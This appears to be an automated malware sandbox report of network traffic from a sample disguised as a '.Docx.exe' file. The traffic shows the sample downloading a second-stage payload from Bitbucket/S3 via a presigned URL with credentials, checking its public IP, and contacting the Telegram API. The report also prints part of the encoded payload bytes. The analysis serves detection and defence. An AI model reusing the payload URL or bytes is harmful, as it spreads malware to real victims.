                                                                                                                      Dec 18, 2024 16:18:45.719540119 CET50096443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:45.719544888 CET44350096149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:45.842967987 CET44350094149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:45.844140053 CET44350094149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:45.844191074 CET50094443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:45.844553947 CET50094443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:45.846566916 CET50100443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:45.846600056 CET44350100149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:45.846672058 CET50100443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:45.847031116 CET50100443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:45.847044945 CET44350100149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:46.296411991 CET44350096149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:46.296494007 CET44350096149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:46.296979904 CET50096443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:46.298795938 CET50104443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:46.298842907 CET44350104149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:46.299345970 CET50096443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:46.302620888 CET50104443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:46.302623034 CET50104443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:46.302664042 CET44350104149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:46.534729004 CET44350098149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:46.540321112 CET50098443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:46.540357113 CET44350098149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:46.540445089 CET50098443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:46.540465117 CET44350098149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:47.101928949 CET44350098149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:47.102011919 CET44350098149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:47.102411032 CET50098443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:47.229437113 CET44350100149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:47.336328030 CET50100443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:47.669385910 CET44350104149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:47.726883888 CET50104443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:50.894192934 CET50098443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:50.894834042 CET50106443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:50.894867897 CET44350106149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:50.894932985 CET50106443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:50.895226955 CET50106443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:50.895236969 CET44350106149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:50.923038006 CET50100443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:50.923067093 CET44350100149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:50.923120022 CET50100443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:50.923127890 CET44350100149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:51.174660921 CET50104443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.174690008 CET44350104149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:51.174827099 CET50104443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.174834013 CET44350104149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:51.477611065 CET44350100149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:51.477700949 CET44350100149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:51.477962971 CET50100443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.478287935 CET50100443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.478913069 CET50107443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.478951931 CET44350107149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:51.479020119 CET50107443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.479228973 CET50107443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.479243994 CET44350107149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:51.722232103 CET44350104149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:51.722326040 CET44350104149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:51.722492933 CET50104443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.722995996 CET50104443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.724267006 CET50108443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.724320889 CET44350108149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:51.724406958 CET50108443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.724658012 CET50108443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.724673033 CET44350108149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:52.257829905 CET44350106149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:52.305058956 CET50106443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:52.860621929 CET44350107149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:52.914378881 CET50107443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:53.125948906 CET44350108149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:53.180018902 CET50108443192.168.2.5149.154.167.220

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 18, 2024 16:16:39.451078892 CET5639653192.168.2.51.1.1.1
                                                                                                                      Dec 18, 2024 16:16:39.589360952 CET53563961.1.1.1192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:41.964534998 CET5035753192.168.2.51.1.1.1
                                                                                                                      Dec 18, 2024 16:16:42.342196941 CET53503571.1.1.1192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:50.664197922 CET6201753192.168.2.51.1.1.1
                                                                                                                      Dec 18, 2024 16:16:50.813894987 CET53620171.1.1.1192.168.2.5
                                                                                                                      Dec 18, 2024 16:17:01.006388903 CET5672753192.168.2.51.1.1.1
                                                                                                                      Dec 18, 2024 16:17:01.145469904 CET53567271.1.1.1192.168.2.5

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Dec 18, 2024 16:16:39.451078892 CET192.168.2.51.1.1.10x6d94Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 16:16:41.964534998 CET192.168.2.51.1.1.10xb94bStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 16:16:50.664197922 CET192.168.2.51.1.1.10xe677Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 16:17:01.006388903 CET192.168.2.51.1.1.10xc85Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Dec 18, 2024 16:16:39.589360952 CET1.1.1.1192.168.2.50x6d94No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 16:16:39.589360952 CET1.1.1.1192.168.2.50x6d94No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 16:16:39.589360952 CET1.1.1.1192.168.2.50x6d94No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 16:16:42.342196941 CET1.1.1.1192.168.2.50xb94bNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 18, 2024 16:16:42.342196941 CET1.1.1.1192.168.2.50xb94bNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 18, 2024 16:16:42.342196941 CET1.1.1.1192.168.2.50xb94bNo error (0)s3-w.us-east-1.amazonaws.com52.217.32.148A (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 16:16:42.342196941 CET1.1.1.1192.168.2.50xb94bNo error (0)s3-w.us-east-1.amazonaws.com3.5.24.26A (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 16:16:42.342196941 CET1.1.1.1192.168.2.50xb94bNo error (0)s3-w.us-east-1.amazonaws.com54.231.225.201A (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 16:16:42.342196941 CET1.1.1.1192.168.2.50xb94bNo error (0)s3-w.us-east-1.amazonaws.com52.216.217.1A (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 16:16:42.342196941 CET1.1.1.1192.168.2.50xb94bNo error (0)s3-w.us-east-1.amazonaws.com3.5.28.213A (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 16:16:42.342196941 CET1.1.1.1192.168.2.50xb94bNo error (0)s3-w.us-east-1.amazonaws.com54.231.137.41A (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 16:16:42.342196941 CET1.1.1.1192.168.2.50xb94bNo error (0)s3-w.us-east-1.amazonaws.com52.217.199.169A (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 16:16:42.342196941 CET1.1.1.1192.168.2.50xb94bNo error (0)s3-w.us-east-1.amazonaws.com52.216.213.33A (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 16:16:50.813894987 CET1.1.1.1192.168.2.50xe677No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 18, 2024 16:16:50.813894987 CET1.1.1.1192.168.2.50xe677No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 16:16:50.813894987 CET1.1.1.1192.168.2.50xe677No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 16:16:50.813894987 CET1.1.1.1192.168.2.50xe677No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 16:16:50.813894987 CET1.1.1.1192.168.2.50xe677No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 16:16:50.813894987 CET1.1.1.1192.168.2.50xe677No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 16:17:01.145469904 CET1.1.1.1192.168.2.50xc85No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • bitbucket.org
                                                                                                                      • bbuseruploads.s3.amazonaws.com
                                                                                                                      • api.telegram.org
                                                                                                                      • checkip.dyndns.org

                                                                                                                      HTTP Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.549731132.226.247.73806656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 18, 2024 16:16:50.982860088 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 18, 2024 16:16:52.435329914 CET321INHTTP/1.1 200 OK
                                                                                                                      Date: Wed, 18 Dec 2024 15:16:52 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 311d2843be3e0ec9cf520af164935f44
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.549759132.226.247.7380432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 18, 2024 16:17:02.002053022 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 18, 2024 16:17:03.327090025 CET321INHTTP/1.1 200 OK
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:03 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: ef3be955122cdf3f414914dc7a935acc
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.549775132.226.247.73802140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 18, 2024 16:17:08.791676998 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 18, 2024 16:17:10.098916054 CET321INHTTP/1.1 200 OK
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:09 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 6f70ffcdc96bae2402542dcdc40611ea
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      HTTPS Proxied Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.549715185.166.143.494431560C:\Users\user\Desktop\D.G Governor Istek,Docx.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:16:41 UTC187OUTGET /ntim1478/gpmaw/downloads/202_Cneehezxuzj HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                      Host: bitbucket.org
                                                                                                                      2024-12-18 15:16:41 UTC5919INHTTP/1.1 302 Found
                                                                                                                      Date: Wed, 18 Dec 2024 15:16:41 GMT
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Content-Length: 0
                                                                                                                      Server: AtlassianEdge
                                                                                                                      Location: https://bbuseruploads.s3.amazonaws.com/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c09f-4309-a330-311e812ab273/202_Cneehezxuzj?response-content-disposition=attachment%3B%20filename%3D%22202_Cneehezxuzj%22&AWSAccessKeyId=ASIA6KOSE3BNEALCMKKZ&Signature=5HNNyrRhI17TtxEvBhRXBlIjzcE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJj%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIHzBvFwyiabwJo1RlEoXCuvYHlAj6GVUZcZJKMBSK6ENAiEA3lwDPyl2LnkI6qpuGfjEQS9N8qqF9JEL2NUziGWNIn8qpwIIYBAAGgw5ODQ1MjUxMDExNDYiDDj%2BrSjdv5z1DIwKsiqEApJ6u4jhBQd6j%2F999%2FKkXtAvgpY37KiSNSwzYxBC8wGz1X3uO0OlC3WWJ5HAblmMn89zpI6f9%2BRlrc7sEdixhZASuJjFVAm0rJDVe%2BcMUyRk%2FduiqyuXya%2BU7xCgRBhsKNelgYsfCR%2FexdjG4q1vGkc8XCMvlYKeYOdtMKIRlFzLXsXEh8MrIP8O90zcOf2tzV0xktzXWNPU1azrGxRsSRJXq35xOUz0%2FJR%2FQfN0mW9QaJrOxnrli3WFJajfSk9OFZwIhVZ8aqEv%2FHqW4txt8CUPEz8sZ1QR29gsSzQcgvThmwSrYgPJSR2%2BdgVltAF%2F17Esh33PZq4j1bIpUHdeXcONqWL9MJ3Ji7sGOp0BjViqRpDV2XSIOnqCOIjo564QwrPkJGWVJI%2B7Qg%2BAmAfIYrTa4QwMXzoydc9fWDEBwHeXx4VGraN4rvN9o4uGCAK98mQ8Io30C [TRUNCATED]
                                                                                                                      Expires: Wed, 18 Dec 2024 15:16:41 GMT
                                                                                                                      Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                      X-Used-Mesh: False
                                                                                                                      Vary: Accept-Language, Origin
                                                                                                                      Content-Language: en
                                                                                                                      X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                      X-Dc-Location: Micros-3
                                                                                                                      X-Served-By: 35b9ad4f345a
                                                                                                                      X-Version: 020364176b66
                                                                                                                      X-Static-Version: 020364176b66
                                                                                                                      X-Request-Count: 889
                                                                                                                      X-Render-Time: 0.04507756233215332
                                                                                                                      X-B3-Traceid: 1aff189c891048b1b5c148517a921f48
                                                                                                                      X-B3-Spanid: 68c7d9651d58cf77
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      Content-Security-Policy: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-serv [TRUNCATED]
                                                                                                                      X-Usage-Quota-Remaining: 999179.981
                                                                                                                      X-Usage-Request-Cost: 833.10
                                                                                                                      X-Usage-User-Time: 0.021404
                                                                                                                      X-Usage-System-Time: 0.003589
                                                                                                                      X-Usage-Input-Ops: 0
                                                                                                                      X-Usage-Output-Ops: 0
                                                                                                                      Age: 0
                                                                                                                      X-Cache: MISS
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      X-Xss-Protection: 1; mode=block
                                                                                                                      Atl-Traceid: 1aff189c891048b1b5c148517a921f48
                                                                                                                      Atl-Request-Id: 1aff189c-8910-48b1-b5c1-48517a921f48
                                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                      Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                      Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                      Server-Timing: atl-edge;dur=159,atl-edge-internal;dur=6,atl-edge-upstream;dur=154,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.54971652.217.32.1484431560C:\Users\user\Desktop\D.G Governor Istek,Docx.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:16:43 UTC1287OUTGET /e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c09f-4309-a330-311e812ab273/202_Cneehezxuzj?response-content-disposition=attachment%3B%20filename%3D%22202_Cneehezxuzj%22&AWSAccessKeyId=ASIA6KOSE3BNEALCMKKZ&Signature=5HNNyrRhI17TtxEvBhRXBlIjzcE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJj%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIHzBvFwyiabwJo1RlEoXCuvYHlAj6GVUZcZJKMBSK6ENAiEA3lwDPyl2LnkI6qpuGfjEQS9N8qqF9JEL2NUziGWNIn8qpwIIYBAAGgw5ODQ1MjUxMDExNDYiDDj%2BrSjdv5z1DIwKsiqEApJ6u4jhBQd6j%2F999%2FKkXtAvgpY37KiSNSwzYxBC8wGz1X3uO0OlC3WWJ5HAblmMn89zpI6f9%2BRlrc7sEdixhZASuJjFVAm0rJDVe%2BcMUyRk%2FduiqyuXya%2BU7xCgRBhsKNelgYsfCR%2FexdjG4q1vGkc8XCMvlYKeYOdtMKIRlFzLXsXEh8MrIP8O90zcOf2tzV0xktzXWNPU1azrGxRsSRJXq35xOUz0%2FJR%2FQfN0mW9QaJrOxnrli3WFJajfSk9OFZwIhVZ8aqEv%2FHqW4txt8CUPEz8sZ1QR29gsSzQcgvThmwSrYgPJSR2%2BdgVltAF%2F17Esh33PZq4j1bIpUHdeXcONqWL9MJ3Ji7sGOp0BjViqRpDV2XSIOnqCOIjo564QwrPkJGWVJI%2B7Qg%2BAmAfIYrTa4QwMXzoydc9fWDEBwHeXx4VGraN4rvN9o4uGCAK98mQ8Io30CJ2mll5bGrmu1Y%2B9SoBV38pLHiwvgAzvv3NdmAsCcGR [TRUNCATED]
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                      Host: bbuseruploads.s3.amazonaws.com
                                                                                                                      2024-12-18 15:16:44 UTC544INHTTP/1.1 200 OK
                                                                                                                      x-amz-id-2: Mqm+4psmcKfeWkmFYRRyNVAvp3Yw4HBUTxYxAACYmF6bjbqnHJee4H7DqjO/+MpelZ/642gFueg=
                                                                                                                      x-amz-request-id: 7A5R0WHAX4BV1S95
                                                                                                                      Date: Wed, 18 Dec 2024 15:16:45 GMT
                                                                                                                      Last-Modified: Tue, 10 Dec 2024 22:09:20 GMT
                                                                                                                      ETag: "26779352338d9dc792b7823fbf8d3268"
                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                      x-amz-version-id: IA20jz0GkMTujfnoGO26P_HUbrxCsGFq
                                                                                                                      Content-Disposition: attachment; filename="202_Cneehezxuzj"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Length: 777592
                                                                                                                      Server: AmazonS3
                                                                                                                      Connection: close
                                                                                                                      2024-12-18 15:16:44 UTC16384INData Raw: 68 34 2b 47 4f 67 53 49 6b 69 7a 30 43 50 45 44 39 67 50 2f 42 2f 33 32 42 76 44 39 2f 2f 66 2b 43 4f 2f 34 38 41 50 36 37 77 50 31 41 76 6a 7a 39 66 34 42 2b 66 6b 49 38 76 66 37 38 76 2f 77 41 2f 62 32 41 66 66 7a 42 76 6e 2b 2b 2f 48 2b 2f 41 67 42 38 50 54 33 2f 77 45 49 38 2f 55 42 42 50 58 7a 2f 66 72 32 41 51 49 42 42 66 37 37 37 77 45 42 41 66 48 30 2f 77 55 44 41 2f 49 41 41 41 50 2f 2b 76 75 48 6a 34 59 36 42 49 69 53 4c 43 2f 38 38 2f 50 32 38 77 67 47 41 77 6a 34 68 34 2b 47 4f 67 53 49 6b 69 7a 49 78 35 32 4c 6b 4e 6a 54 7a 72 2f 43 78 5a 36 2b 30 37 37 61 31 4d 36 6d 6c 6f 75 2f 77 39 72 48 31 74 65 6a 78 74 54 59 77 38 50 48 70 49 2b 54 78 39 50 48 31 63 4c 56 72 63 53 2f 7a 63 50 61 32 70 32 49 6b 74 48 52 78 38 6a 42 76 71 33 52 76 38 7a
                                                                                                                      Data Ascii: h4+GOgSIkiz0CPED9gP/B/32BvD9//f+CO/48AP67wP1Avjz9f4B+fkI8vf78v/wA/b2AffzBvn++/H+/AgB8PT3/wEI8/UBBPXz/fr2AQIBBf777wEBAfH0/wUDA/IAAAP/+vuHj4Y6BIiSLC/88/P28wgGAwj4h4+GOgSIkizIx52LkNjTzr/CxZ6+077a1M6mlou/w9rH1tejxtTYw8PHpI+Tx9PH1cLVrcS/zcPa2p2IktHRx8jBvq3Rv8z
                                                                                                                      2024-12-18 15:16:44 UTC480INData Raw: 55 49 31 31 51 71 6f 59 53 68 44 56 72 77 67 47 59 57 48 78 41 4c 44 68 61 37 53 58 7a 31 68 4a 6c 61 78 71 74 51 7a 33 38 30 6c 54 61 35 31 2b 50 45 2f 6a 64 53 4e 52 54 4d 38 4c 78 46 53 6e 4a 4a 6f 33 73 36 59 33 39 46 59 38 76 2f 46 32 37 73 35 44 4d 6e 68 76 48 5a 6e 31 62 32 38 4e 74 76 61 47 49 46 70 34 75 66 61 43 58 77 63 76 72 65 57 53 78 64 64 59 6a 31 66 30 35 59 39 6a 61 54 62 63 39 36 4b 57 53 4b 77 55 39 4b 70 34 73 47 57 78 59 37 4b 74 2b 7a 45 30 51 6e 32 5a 49 35 6c 41 32 2f 66 42 32 58 69 35 32 6f 61 73 2f 79 59 31 69 2b 61 4a 6e 32 57 2b 67 2f 2f 4e 62 68 63 67 6d 57 4f 43 75 6e 45 4a 6b 6e 43 43 6a 30 45 55 46 43 64 6b 42 75 75 6a 67 7a 39 6f 44 66 32 4b 44 56 77 55 39 57 76 5a 66 6c 42 67 65 2f 6a 39 5a 62 4b 67 42 58 45 2f 47 52 51
                                                                                                                      Data Ascii: UI11QqoYShDVrwgGYWHxALDha7SXz1hJlaxqtQz380lTa51+PE/jdSNRTM8LxFSnJJo3s6Y39FY8v/F27s5DMnhvHZn1b28NtvaGIFp4ufaCXwcvreWSxddYj1f05Y9jaTbc96KWSKwU9Kp4sGWxY7Kt+zE0Qn2ZI5lA2/fB2Xi52oas/yY1i+aJn2W+g//NbhcgmWOCunEJknCCj0EUFCdkBuujgz9oDf2KDVwU9WvZflBge/j9ZbKgBXE/GRQ
